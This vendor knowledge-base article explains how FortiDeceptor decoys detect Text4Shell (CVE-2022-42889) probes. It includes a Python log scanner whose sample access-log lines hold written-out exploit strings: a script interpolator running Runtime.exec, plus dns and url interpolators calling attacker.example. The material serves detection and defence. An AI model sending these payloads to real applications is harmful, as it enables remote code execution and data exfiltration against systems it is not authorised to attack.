FortiDeceptor
FortiDeceptor provides Deception-based Breach Protection to deceive, expose and eliminate external and internal threats.
mbensimon
Staff
Article Id 227639
Description

This article describes how FortiDeceptor decoys can detect activity related to the Apache 'Text4Shell' vulnerability, CVE-2022-42889 in Apache Commons Text (the related interpolation flaw in Apache Commons Configuration is tracked as CVE-2022-33980), which can lead to remote code execution.

 

'Apache Commons Text is a low-level library for performing various text operations, such as escaping, calculating string differences, and substituting placeholders in the text with values looked up through interpolators.

Some of the available interpolators can trigger network access or code execution when using the string substitution feature.

This is intended, but it also means an application that includes user input in the string passed to the substitution without properly sanitizing it would allow an attacker to trigger those interpolators.'

 

Cyber Deception against cyber attacks that try to leverage the Text4Shell vulnerability

 

FortiDeceptor starts by deploying network decoys across the network segments, creating a fake environment that simulates the real network and assets.

'Text4Shell' exploitation attempts target web applications built on the Apache Commons Text library, and they arrive over HTTP as requests carrying interpolator strings such as ${script:...}, ${dns:...} or ${url:...} in a parameter, path or header. Network decoys such as Ubuntu and CentOS with a web server enabled are therefore deployed across several network locations such as Data Centers / DMZ / Cloud (FortiDeceptor uses Apache software on its Linux decoys), so that an attacker scanning for vulnerable web endpoints reaches a decoy.

Scope

The deception decoys and lures against 'Text4Shell' attacks can be used in FortiDeceptor version 3.3 and above.

Solution

Cyber Deception Against 'Text4Shell' attacks:

 

1) Configure the network segments under the 'Deployment Network' section that FortiDeceptor will use to deploy network decoys (due to the nature of the attack, verify that they cover the Data Center / DMZ / Cloud segments where the web servers are located).

 

2) Deploy Linux network decoys (Linux with the web service enabled) across the Data Center / DMZ / Cloud network VLAN segments that are configured under the 'Deployment Network' section.

 

3) Once a threat actor or malware tries to penetrate a decoy running a web server, FortiDeceptor triggers a real-time alert.

 

4) FortiDeceptor leverages the Fortinet Security Fabric or third-party tools to execute a threat mitigation response and isolate the threat.
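As an added illustration (not FortiDeceptor's own detection logic, and not code from the original article), the following Python script shows what a Text4Shell probe looks like in the access log of an Apache httpd decoy and how it can be classified by the interpolator it tries to invoke. The log lines, IP addresses and host names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Interpolators in Apache Commons Text 1.5-1.9 that reach the network or run
# code when a ${prefix:...} placeholder is substituted (CVE-2022-42889).
# Matched case-insensitively so mixed-case probes are not missed.
PATTERN = re.compile(r"\$\{\s*(script|dns|url)\s*:", re.IGNORECASE)

# Apache combined log format as written by httpd on a Linux decoy.
# Constructed regex for this example; it is not FortiDeceptor's parser.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def decode_layers(value, max_rounds=3):
    """Undo a bounded number of URL-encoding layers.

    Attackers often encode the payload once or twice, so "%2524%257Bscript"
    must be reduced to "${script" before pattern matching.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_text4shell(line):
    """Return a dict describing the probe if the log line carries a Text4Shell
    interpolator in the request path, referer or user-agent; else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line; skip rather than crash
    for field in ("path", "referer", "ua"):
        decoded = decode_layers(m.group(field))
        hit = PATTERN.search(decoded)
        if hit:
            return {
                "src_ip": m.group("ip"),
                "time": m.group("ts"),
                "field": field,
                "interpolator": hit.group(1).lower(),
                "payload": decoded,
            }
    return None


def scan(lines):
    """Run find_text4shell over an iterable of log lines and keep the hits."""
    return [r for r in (find_text4shell(l) for l in lines) if r]


# Constructed sample access log for a decoy web server (not real traffic).
SAMPLE_LOG = [
    '10.0.5.23 - - [18/Oct/2022:14:02:11 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    # script interpolator, single URL-encoded, in a query parameter
    '198.51.100.7 - - [18/Oct/2022:14:02:13 +0000] "GET /search?q=%24%7Bscript'
    '%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27id%27)%7D HTTP/1.1" '
    '404 196 "-" "curl/7.85.0"',
    # dns interpolator smuggled in the User-Agent header
    '198.51.100.7 - - [18/Oct/2022:14:02:14 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "${dns:address|attacker.example}"',
    # url interpolator, double URL-encoded, in a query parameter
    '203.0.113.9 - - [18/Oct/2022:14:05:40 +0000] "GET /login?user=%2524%257Burl'
    '%253AUTF-8%253Ahttp%253A%252F%252Fattacker.example%252Fx%257D HTTP/1.1" '
    '404 196 "-" "python-requests/2.28.1"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['src_ip']} {hit['interpolator']} via {hit['field']}: {hit['payload']}")
```

Because a decoy serves no legitimate users, any request to it is already alertable; the classification only adds which interpolator (script, dns or url) the attacker attempted, which is useful context when the alert is forwarded to FortiSIEM or FortiSOAR. A decoy running Apache httpd does not itself execute Commons Text, so the probe cannot succeed there; the value of the decoy is the early warning.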

 

FortiDeceptor is part of the Fortinet Security Fabric:

 

FortiDeceptor is natively integrated with FortiGate, FortiNAC, FortiSIEM, FortiAnalyzer, FortiSOAR, FortiEDR and other Fabric solutions, as well as third-party tools, to automate the mitigation response based on attack detection.